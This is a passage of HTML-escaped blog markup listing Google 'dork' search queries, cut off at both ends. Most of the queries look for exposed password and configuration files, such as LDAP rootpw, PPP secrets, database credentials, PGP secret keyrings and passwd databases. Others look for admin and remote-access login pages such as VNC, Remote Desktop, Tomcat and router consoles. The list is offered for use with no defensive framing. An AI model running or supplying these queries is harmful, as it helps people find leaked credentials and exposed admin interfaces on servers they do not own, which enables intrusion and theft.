-man: -sample&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”wvdial.conf” intext:”password”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/db/main.mdb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/wwwboard&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:/yabb/Members/Admin.dat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ccbill filetype:log&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:cgi-bin inurl:calendar.cfg&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:chap-secrets -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:config.php dbuname dbpass&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:filezilla.xml -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:nuke filetype:sql&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ospfd.conf intext:password -sample -test -tutorial -download&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:pap-secrets -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:pass.dat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:perform filetype:ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:perform.ini filetype:ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:secring ext:skr | ext:pgp | ext:bak&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:server.cfg rcon password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ventrilo_srv.ini adminpassword&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:vtund.conf intext:pass -cvs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:zebra.conf intext:password -sample -test -tutorial -download&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;LeapFTP intitle:”index.of./” sites.ini modified&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;master.passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;mysql history files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;NickServ registration passwords&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;passlist&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;passlist.txt (a better way)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;passwd / etc (reliable)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;people.lst&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;psyBNC config files&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;pwd.db&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;server-dbs “intitle:index of”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;signin filetype:url&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;spwd.db / passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;trillian.ini&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;[WFClient] Password= filetype:ica&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”remote assessment” OpenAanval Console&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“bp blog admin” intitle:login | intitle:admin -site:johnny.ihackstuff.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Emergisoft web applications are a part of our”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Establishing a secure Integrated Lights Out session with” OR intitle:”Data Frame – Browser not HTTP 1.1 compatible” OR intitle:”HP Integrated Lights-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“HostingAccelerator” intitle:”login” +”Username” -”news” -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“iCONECT 4.1 :: Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“IMail Server Web Messaging” intitle:login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“inspanel” intitle:”login” -”cannot” “Login ID” -site:inspediumsoft.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“intitle:3300 Integrated Communications Platform” inurl:main.htm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Login – Sun Cobalt RaQ”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“login prompt” inurl:GM.cgi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Login to Usermin” inurl:20000&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Microsoft CRM : Unsupported Browser Version”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“OPENSRS Domain Management” inurl:manage.cgi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“pcANYWHERE EXPRESS Java Client”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Please authenticate yourself to get access to the management interface”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“please log in”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Please login with admin pass” -”leak” -sourceforge&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;CuteNews” “2003..2005 CutePHP”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;DWMail” password intitle:dwmail&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Merak Mail Server Software” -.gov -.mil -.edu -site:merakmailserver.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Midmart Messageboard” “Administrator Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Monster Top List” MTL numrange:200-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;UebiMiau” -site:sourceforge.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“site info for” “Enter Admin Password”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“SquirrelMail version” “By the SquirrelMail development Team”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“SysCP – login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“This is a restricted Access Server” “Javas?ri?t Not Enabled!”|”Messenger Express” -edu -ac&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“This section is for Administrators only. If you are an administrator then please”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“ttawlogin.cgi/?action=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“VHCS Pro ver” -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“VNC Desktop” inurl:5800&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“WebExplorer Server – Login” “Welcome to WebExplorer Server”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“WebSTAR Mail – Please Log In”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“You have requested access to a restricted area of our website. Please authenticate yourself to continue.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“You have requested to access the management functions” -.edu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(intitle:”Please login – Forums&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;UBB.threads”)|(inurl:login.php “ubb”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(intitle:”Please login – Forums&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;4images Administration Control Panel&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allintitle:”Welcome to the Cyclades”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:”exchange/logon.asp”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:wps/portal/ login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ASP.login_aspx “ASP.NET_SessionId”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;CGI:IRC Login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ext:cgi intitle:”control panel” “enter your owner password to continue!”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ez Publish administration&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:php inurl:”webeditor.php”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pl “Download: SuSE Linux Openexchange Server CA”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:r2w r2w&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Mail admins login here to administrate your domain.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Storage Management Server for” intitle:”Server Administration”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”vbulletin” inurl:admincp&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Admin Login” “admin login” “blogware”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Admin login” “Web Site Administration” “Copyright”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”AlternC Desktop”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Athens Authentication Point”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”b2evo &gt; Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ColdFusion Administrator Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”communigate pro * *” intitle:”entrance”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Dell Remote Access Controller”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Docutek ERes – Admin Login” -edu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Employee Intranet Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ePowerSwitch Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”eXist Database Administration” -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”EXTRANET * – Identification”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”EXTRANET login” -.edu -.mil -.gov&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”EZPartner” -netpond&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”i-secure v1.1″ -edu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Icecast Administration Admin Page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”iDevAffiliate – admin” -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ISPMan : Unauthorized Access prohibited”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ITS System Information” “Please log on to the SAP System”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Kurant Corporation StoreSense” filetype:bok&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ListMail Login” admin -demo&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Login -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Easy File Sharing Web Server”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Login Forum&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;AnyBoard” intitle:”If you are a new user:” intext:”Forum&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;AnyBoard” inurl:gochat -edu&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Login to Cacti”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Login to the forums – @www.aimoo.com” inurl:login.cfm?id=&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”MailMan Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Merak Mail Server Web Administration” -ihackstuff.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”microsoft certificate services” inurl:certsrv&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”MikroTik RouterOS Managing Webpage”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”MX Control Console” “If you can’t remember”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Novell Web Services” intext:”Select a service and a language.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”oMail-admin Administration – Login” -inurl:omnis.ch&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”OnLine Recruitment Program – Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Philex 0.2*” -s?ri?t -site:freelists.org&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”PHP Advanced Transfer” inurl:”login.php”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”php icalendar administration” -site:sourceforge.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”php icalendar administration” -site:sourceforge.net&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”phpPgAdmin – Login” Language&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”PHProjekt – login” login password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”please login” “your password is *”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Remote Desktop Web Connection” inurl:tsweb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”SFXAdmin – sfx_global” | intitle:”SFXAdmin – sfx_local” | intitle:”SFXAdmin – sfx_test”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”SHOUTcast Administrator” inurl:admin.cgi&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”site administration: please log in” “site designed by emarketsouth”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Supero Doctor III” -inurl:supermicro&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”SuSE Linux Openexchange Server” “Please activate Javas?ri?t!”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”teamspeak server-administration&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Tomcat Server Administration”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”TOPdesk ApplicationServer”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”TUTOS Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”TWIG Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”vhost” intext:”vHost . 2000-2004″&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Virtual Server Administration System”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”VisNetic WebMail” inurl:”/mail/”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”VitalQIP IP Management System”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”VMware Management Interface:” inurl:”vmware/en/”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”VNC viewer for Java”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”WebLogic Server” intitle:”Console Login” inurl:console&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Welcome Site/User Administrator” “Please select the language” -demos&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Welcome to Mailtraq WebMail”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”welcome to netware *” -site:novell.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”xams 0.0.0..15 – Login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”XMail Web Administration Interface” intext:Login intext:password&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Zope Help System” inurl:HelpSys&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”ZyXEL Prestige Router” “Enter password”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”inc. vpn 3000 concentrator”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:asterisk.management.portal web-access&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:endymion.sak?.mail.login.page | inurl:sake.servlet&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Group-Office “Enter your username and password to login”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:ilohamail ”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 